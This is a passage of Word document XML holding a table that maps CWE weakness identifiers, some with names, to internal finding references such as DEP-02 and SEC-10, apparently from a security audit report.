          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-477</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Use of Obsolete Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-478</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-494</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Download of Code Without Integrity Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-01, DEP-02, DEP-03, DEP-05, DEP-10, DET-16, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-521</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Weak Password Requirements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-522</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-532</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Insertion of Sensitive Information into Log File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-12, CI-03, PB1-16, PB2-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-540</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Inclusion of Sensitive Information in Source Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-03, SEC-04, SEC-05, SEC-09, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-561</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dead Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-573</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-611</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-617</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-625</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-06, CF-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-628</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-636</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Not Failing Securely (Failing Open)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-639</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authorization Bypass Through User-Controlled Key (IDOR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-09, CF-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-640</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-665</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-05, DET-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-670</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-03, PB1-09, PB1-13, PB1-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-672</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-674</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
